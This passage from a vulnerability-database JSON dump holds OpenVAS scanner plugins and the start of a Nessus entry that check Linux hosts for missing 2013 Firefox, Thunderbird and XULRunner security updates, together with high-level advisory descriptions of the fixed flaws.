exploited by a specially-crafted\n HTML mail message as JavaScript is disabled by default for mail messages.\n They could be exploited another way in Thunderbird, for example, when\n viewing the full remote content of an RSS feed.\n\n All Thunderbird users should upgrade to this updated package, which\n contains Thunderbird version 17.0.7 ESR, which corrects these issues. After\n installing the update, Thunderbird must be restarted for the changes to\n take effect.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"thunderbird\", rpm:\"thunderbird~17.0.7~1.el6.centos\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:19", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1687", "CVE-2013-1692", "CVE-2013-1685", "CVE-2013-1697", "CVE-2013-1694", "CVE-2013-1690", "CVE-2013-1684", "CVE-2013-1686", "CVE-2013-1682", "CVE-2013-1693"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2013-06-27T00:00:00", "id": "OPENVAS:1361412562310881759", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881759", "type": "openvas", "title": "CentOS Update for xulrunner CESA-2013:0981 centos6", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for xulrunner CESA-2013:0981 centos6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.881759\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-06-27 09:59:49 +0530 (Thu, 27 Jun 2013)\");\n script_cve_id(\"CVE-2013-1682\", \"CVE-2013-1684\", \"CVE-2013-1685\", \"CVE-2013-1686\",\n \"CVE-2013-1687\", \"CVE-2013-1690\", \"CVE-2013-1692\", \"CVE-2013-1693\",\n \"CVE-2013-1694\", \"CVE-2013-1697\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"CentOS Update for xulrunner CESA-2013:0981 centos6\");\n\n script_xref(name:\"CESA\", value:\"2013:0981\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2013-June/019809.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'xulrunner'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS6\");\n script_tag(name:\"affected\", value:\"xulrunner on CentOS 6\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"insight\", value:\"Mozilla Firefox is an open source web browser. XULRunner provides the XUL\n Runtime environment for Mozilla Firefox.\n\n Several flaws were found in the processing of malformed web content. A web\n page containing malicious content could cause Firefox to crash or,\n potentially, execute arbitrary code with the privileges of the user running\n Firefox. (CVE-2013-1682, CVE-2013-1684, CVE-2013-1685, CVE-2013-1686,\n CVE-2013-1687, CVE-2013-1690)\n\n It was found that Firefox allowed data to be sent in the body of\n XMLHttpRequest (XHR) HEAD requests. In some cases this could allow\n attackers to conduct Cross-Site Request Forgery (CSRF) attacks.\n (CVE-2013-1692)\n\n Timing differences in the way Firefox processed SVG image files could\n allow an attacker to read data across domains, potentially leading to\n information disclosure. (CVE-2013-1693)\n\n Two flaws were found in the way Firefox implemented some of its internal\n structures (called wrappers). An attacker could use these flaws to bypass\n some restrictions placed on them. This could lead to unexpected behavior or\n a potentially exploitable crash. (CVE-2013-1694, CVE-2013-1697)\n\n Red Hat would like to thank the Mozilla project for reporting these issues.\n Upstream acknowledges Gary Kwong, Jesse Ruderman, Andrew McCreight,\n Abhishek Arya, Mariusz Mlynski, Nils, Johnathan Kuskos, Paul Stone, Boris\n Zbarsky, and moz_bug_r_a4 as the original reporters of these issues.\n\n For technical details regarding these flaws, refer to the Mozilla\n security advisories for Firefox 17.0.7 ESR. You can find a link to the\n Mozilla advisories in the References section of this erratum.\n\n All Firefox users should upgrade to these updated packages, which contain\n Firefox version 17.0.7 ESR, which corrects these issues. After installing\n the update, Firefox must be restarted for the changes to take effect.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"xulrunner\", rpm:\"xulrunner~17.0.7~1.el6.centos\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xulrunner-devel\", rpm:\"xulrunner-devel~17.0.7~1.el6.centos\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-23T13:09:34", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1687", "CVE-2013-1692", "CVE-2013-1685", "CVE-2013-1697", "CVE-2013-1694", "CVE-2013-1690", "CVE-2013-1684", "CVE-2013-1686", "CVE-2013-1682", "CVE-2013-1693"], "description": "Check for the Version of thunderbird", "modified": "2018-01-23T00:00:00", "published": "2013-06-27T00:00:00", "id": "OPENVAS:881757", "href": "http://plugins.openvas.org/nasl.php?oid=881757", "type": "openvas", "title": "CentOS Update for thunderbird CESA-2013:0982 centos6 ", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for thunderbird CESA-2013:0982 centos6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Mozilla Thunderbird is a standalone mail and newsgroup client.\n\n Several flaws were found in the processing of malformed content. Malicious\n content could cause Thunderbird to crash or, potentially, execute arbitrary\n code with the privileges of the user running Thunderbird. (CVE-2013-1682,\n CVE-2013-1684, CVE-2013-1685, CVE-2013-1686, CVE-2013-1687, CVE-2013-1690)\n\n It was found that Thunderbird allowed data to be sent in the body of\n XMLHttpRequest (XHR) HEAD requests. In some cases this could allow\n attackers to conduct Cross-Site Request Forgery (CSRF) attacks.\n (CVE-2013-1692)\n\n Timing differences in the way Thunderbird processed SVG image files could\n allow an attacker to read data across domains, potentially leading to\n information disclosure. (CVE-2013-1693)\n\n Two flaws were found in the way Thunderbird implemented some of its\n internal structures (called wrappers). An attacker could use these flaws to\n bypass some restrictions placed on them. This could lead to unexpected\n behavior or a potentially exploitable crash. (CVE-2013-1694, CVE-2013-1697)\n\n Red Hat would like to thank the Mozilla project for reporting these issues.\n Upstream acknowledges Gary Kwong, Jesse Ruderman, Andrew McCreight,\n Abhishek Arya, Mariusz Mlynski, Nils, Johnathan Kuskos, Paul Stone, Boris\n Zbarsky, and moz_bug_r_a4 as the original reporters of these issues.\n\n Note: All of the above issues cannot be exploited by a specially-crafted\n HTML mail message as JavaScript is disabled by default for mail messages.\n They could be exploited another way in Thunderbird, for example, when\n viewing the full remote content of an RSS feed.\n\n All Thunderbird users should upgrade to this updated package, which\n contains Thunderbird version 17.0.7 ESR, which corrects these issues. After\n installing the update, Thunderbird must be restarted for the changes to\n take effect.\";\n\n\ntag_affected = \"thunderbird on CentOS 6\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_id(881757);\n script_version(\"$Revision: 8494 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-23 07:57:55 +0100 (Tue, 23 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-06-27 09:59:18 +0530 (Thu, 27 Jun 2013)\");\n script_cve_id(\"CVE-2013-1682\", \"CVE-2013-1684\", \"CVE-2013-1685\", \"CVE-2013-1686\",\n \"CVE-2013-1687\", \"CVE-2013-1690\", \"CVE-2013-1692\", \"CVE-2013-1693\",\n \"CVE-2013-1694\", \"CVE-2013-1697\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"CentOS Update for thunderbird CESA-2013:0982 centos6 \");\n\n script_xref(name: \"CESA\", value: \"2013:0982\");\n script_xref(name: \"URL\" , value: \"http://lists.centos.org/pipermail/centos-announce/2013-June/019807.html\");\n script_tag(name: \"summary\" , value: \"Check for the Version of thunderbird\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"thunderbird\", rpm:\"thunderbird~17.0.7~1.el6.centos\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:38:24", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1687", "CVE-2013-1692", "CVE-2013-1685", "CVE-2013-1697", "CVE-2013-1694", "CVE-2013-1690", "CVE-2013-1684", "CVE-2013-1686", "CVE-2013-1682", "CVE-2013-1693"], "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": "2013-06-27T00:00:00", "id": "OPENVAS:1361412562310871014", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871014", "type": "openvas", "title": "RedHat Update for thunderbird RHSA-2013:0982-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for thunderbird RHSA-2013:0982-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871014\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-06-27 09:56:47 +0530 (Thu, 27 Jun 2013)\");\n script_cve_id(\"CVE-2013-1682\", \"CVE-2013-1684\", \"CVE-2013-1685\", \"CVE-2013-1686\",\n \"CVE-2013-1687\", \"CVE-2013-1690\", \"CVE-2013-1692\", \"CVE-2013-1693\",\n \"CVE-2013-1694\", \"CVE-2013-1697\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"RedHat Update for thunderbird RHSA-2013:0982-01\");\n\n script_xref(name:\"RHSA\", value:\"2013:0982-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2013-June/msg00022.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'thunderbird'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_6\");\n script_tag(name:\"affected\", value:\"thunderbird on Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Workstation (v. 6)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"Mozilla Thunderbird is a standalone mail and newsgroup client.\n\n Several flaws were found in the processing of malformed content. Malicious\n content could cause Thunderbird to crash or, potentially, execute arbitrary\n code with the privileges of the user running Thunderbird. (CVE-2013-1682,\n CVE-2013-1684, CVE-2013-1685, CVE-2013-1686, CVE-2013-1687, CVE-2013-1690)\n\n It was found that Thunderbird allowed data to be sent in the body of\n XMLHttpRequest (XHR) HEAD requests. In some cases this could allow\n attackers to conduct Cross-Site Request Forgery (CSRF) attacks.\n (CVE-2013-1692)\n\n Timing differences in the way Thunderbird processed SVG image files could\n allow an attacker to read data across domains, potentially leading to\n information disclosure. (CVE-2013-1693)\n\n Two flaws were found in the way Thunderbird implemented some of its\n internal structures (called wrappers). An attacker could use these flaws to\n bypass some restrictions placed on them. This could lead to unexpected\n behavior or a potentially exploitable crash. (CVE-2013-1694, CVE-2013-1697)\n\n Red Hat would like to thank the Mozilla project for reporting these issues.\n Upstream acknowledges Gary Kwong, Jesse Ruderman, Andrew McCreight,\n Abhishek Arya, Mariusz Mlynski, Nils, Johnathan Kuskos, Paul Stone, Boris\n Zbarsky, and moz_bug_r_a4 as the original reporters of these issues.\n\n Note: All of the above issues cannot be exploited by a specially-crafted\n HTML mail message as JavaScript is disabled by default for mail messages.\n They could be exploited another way in Thunderbird, for example, when\n viewing the full remote content of an RSS feed.\n\n All Thunderbird users should upgrade to this updated package, which\n contains Thunderbird version 17.0.7 ESR, which corrects these issues. After\n installing the update, Thunderbird must be restarted for the changes to\n take effect.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"thunderbird\", rpm:\"thunderbird~17.0.7~1.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"thunderbird-debuginfo\", rpm:\"thunderbird-debuginfo~17.0.7~1.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:14", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1687", "CVE-2013-1692", "CVE-2013-1685", "CVE-2013-1697", "CVE-2013-1694", "CVE-2013-1690", "CVE-2013-1684", "CVE-2013-1686", "CVE-2013-1682", "CVE-2013-1693"], "description": "Oracle Linux Local Security Checks ELSA-2013-0982", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310123604", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123604", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2013-0982", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2013-0982.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123604\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:06:09 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2013-0982\");\n script_tag(name:\"insight\", value:\"ELSA-2013-0982 - thunderbird security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2013-0982\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2013-0982.html\");\n script_cve_id(\"CVE-2013-1682\", \"CVE-2013-1684\", \"CVE-2013-1685\", \"CVE-2013-1686\", \"CVE-2013-1687\", \"CVE-2013-1692\", \"CVE-2013-1693\", \"CVE-2013-1694\", \"CVE-2013-1697\", \"CVE-2013-1690\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux(5|6)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"thunderbird\", rpm:\"thunderbird~17.0.7~1.0.1.el5_9\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"thunderbird\", rpm:\"thunderbird~17.0.7~1.0.1.el6_4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:12", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1687", "CVE-2013-1692", "CVE-2013-1685", "CVE-2013-1697", "CVE-2013-1694", "CVE-2013-1690", "CVE-2013-1684", "CVE-2013-1686", "CVE-2013-1682", "CVE-2013-1693"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2013-06-27T00:00:00", "id": "OPENVAS:1361412562310881753", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881753", "type": "openvas", "title": "CentOS Update for firefox CESA-2013:0981 centos5", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for firefox CESA-2013:0981 centos5\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.881753\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-06-27 09:57:47 +0530 (Thu, 27 Jun 2013)\");\n script_cve_id(\"CVE-2013-1682\", \"CVE-2013-1684\", \"CVE-2013-1685\", \"CVE-2013-1686\",\n \"CVE-2013-1687\", \"CVE-2013-1690\", \"CVE-2013-1692\", \"CVE-2013-1693\",\n \"CVE-2013-1694\", \"CVE-2013-1697\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"CentOS Update for firefox CESA-2013:0981 centos5\");\n\n script_xref(name:\"CESA\", value:\"2013:0981\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2013-June/019818.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'firefox'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS5\");\n script_tag(name:\"affected\", value:\"firefox on CentOS 5\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"insight\", value:\"Mozilla Firefox is an open source web browser. XULRunner provides the XUL\n Runtime environment for Mozilla Firefox.\n\n Several flaws were found in the processing of malformed web content. A web\n page containing malicious content could cause Firefox to crash or,\n potentially, execute arbitrary code with the privileges of the user running\n Firefox. (CVE-2013-1682, CVE-2013-1684, CVE-2013-1685, CVE-2013-1686,\n CVE-2013-1687, CVE-2013-1690)\n\n It was found that Firefox allowed data to be sent in the body of\n XMLHttpRequest (XHR) HEAD requests. In some cases this could allow\n attackers to conduct Cross-Site Request Forgery (CSRF) attacks.\n (CVE-2013-1692)\n\n Timing differences in the way Firefox processed SVG image files could\n allow an attacker to read data across domains, potentially leading to\n information disclosure. (CVE-2013-1693)\n\n Two flaws were found in the way Firefox implemented some of its internal\n structures (called wrappers). An attacker could use these flaws to bypass\n some restrictions placed on them. This could lead to unexpected behavior or\n a potentially exploitable crash. (CVE-2013-1694, CVE-2013-1697)\n\n Red Hat would like to thank the Mozilla project for reporting these issues.\n Upstream acknowledges Gary Kwong, Jesse Ruderman, Andrew McCreight,\n Abhishek Arya, Mariusz Mlynski, Nils, Johnathan Kuskos, Paul Stone, Boris\n Zbarsky, and moz_bug_r_a4 as the original reporters of these issues.\n\n For technical details regarding these flaws, refer to the Mozilla\n security advisories for Firefox 17.0.7 ESR. You can find a link to the\n Mozilla advisories in the References section of this erratum.\n\n All Firefox users should upgrade to these updated packages, which contain\n Firefox version 17.0.7 ESR, which corrects these issues. After installing\n the update, Firefox must be restarted for the changes to take effect.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"firefox\", rpm:\"firefox~17.0.7~1.el5.centos\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-20T14:38:05", "description": "Mozilla Firefox has been updated to the 17.0.7 ESR version, fixing\nbugs and security fixes.\n\n - Mozilla developers identified and fixed several memory\n safety bugs in the browser engine used in Firefox and\n other Mozilla-based products. Some of these bugs showed\n evidence of memory corruption under certain\n circumstances, and we presume that with enough effort at\n least some of these could be exploited to run arbitrary\n code. (MFSA 2013-49)\n\n Gary Kwong, Jesse Ruderman, and Andrew McCreight\n reported memory safety problems and crashes that affect\n Firefox ESR 17, and Firefox 21. (CVE-2013-1682)\n\n - Security researcher Abhishek Arya (Inferno) of the\n Google Chrome Security Team used the Address Sanitizer\n tool to discover a series of use-after-free problems\n rated critical as security issues in shipped software.\n Some of these issues are potentially exploitable,\n allowing for remote code execution. We would also like\n to thank Abhishek for reporting additional\n use-after-free and buffer overflow flaws in code\n introduced during Firefox development. These were fixed\n before general release. (MFSA 2013-50)\n\n - Heap-use-after-free in\n mozilla::dom::HTMLMediaElement::LookupMediaElementURITab\n le. (CVE-2013-1684)\n\n - Heap-use-after-free in nsIDocument::GetRootElement.\n (CVE-2013-1685)\n\n - Heap-use-after-free in mozilla::ResetDir.\n (CVE-2013-1686)\n\n - Security researcher Mariusz Mlynski reported that it is\n possible to compile a user-defined function in the XBL\n scope of a specific element and then trigger an event\n within this scope to run code. In some circumstances,\n when this code is run, it can access content protected\n by System Only Wrappers (SOW) and chrome-privileged\n pages. This could potentially lead to arbitrary code\n execution. Additionally, Chrome Object Wrappers (COW)\n can be bypassed by web content to access privileged\n methods, leading to a cross-site scripting (XSS) attack\n from privileged pages. (MFSA 2013-51 / CVE-2013-1687)\n\n - Security researcher Nils reported that specially crafted\n web content using the onreadystatechange event and\n reloading of pages could sometimes cause a crash when\n unmapped memory is executed. This crash is potentially\n exploitable. (MFSA 2013-53 / CVE-2013-1690)\n\n - Security researcher Johnathan Kuskos reported that\n Firefox is sending data in the body of XMLHttpRequest\n (XHR) HEAD requests, which goes against the XHR\n specification. This can potentially be used for\n Cross-Site Request Forgery (CSRF) attacks against sites\n which do not distinguish between HEAD and POST requests.\n (MFSA 2013-54 / CVE-2013-1692)\n\n - Security researcher Paul Stone of Context Information\n Security discovered that timing differences in the\n processing of SVG format images with filters could allow\n for pixel values to be read. This could potentially\n allow for text values to be read across domains, leading\n to information disclosure. (MFSA 2013-55 /\n CVE-2013-1693)\n\n - Mozilla security researcher moz_bug_r_a4 reported that\n XrayWrappers can be bypassed to call content-defined\n toString and valueOf methods through DefaultValue. This\n can lead to unexpected behavior when privileged code\n acts on the incorrect values. (MFSA 2013-59 /\n CVE-2013-1697)", "edition": 17, "published": "2013-07-06T00:00:00", "title": "SuSE 11.2 Security Update : Mozilla Firefox (SAT Patch Number 7976)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1687", "CVE-2013-1692", "CVE-2013-1685", "CVE-2013-1697", "CVE-2013-1690", "CVE-2013-1684", "CVE-2013-1686", "CVE-2013-1682", "CVE-2013-1693"], "modified": "2013-07-06T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:MozillaFirefox-branding-SLED", "cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:11:MozillaFirefox-translations", "p-cpe:/a:novell:suse_linux:11:MozillaFirefox"], "id": "SUSE_11_FIREFOX-20130628-130628.NASL", "href": "https://www.tenable.com/plugins/nessus/67195", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself 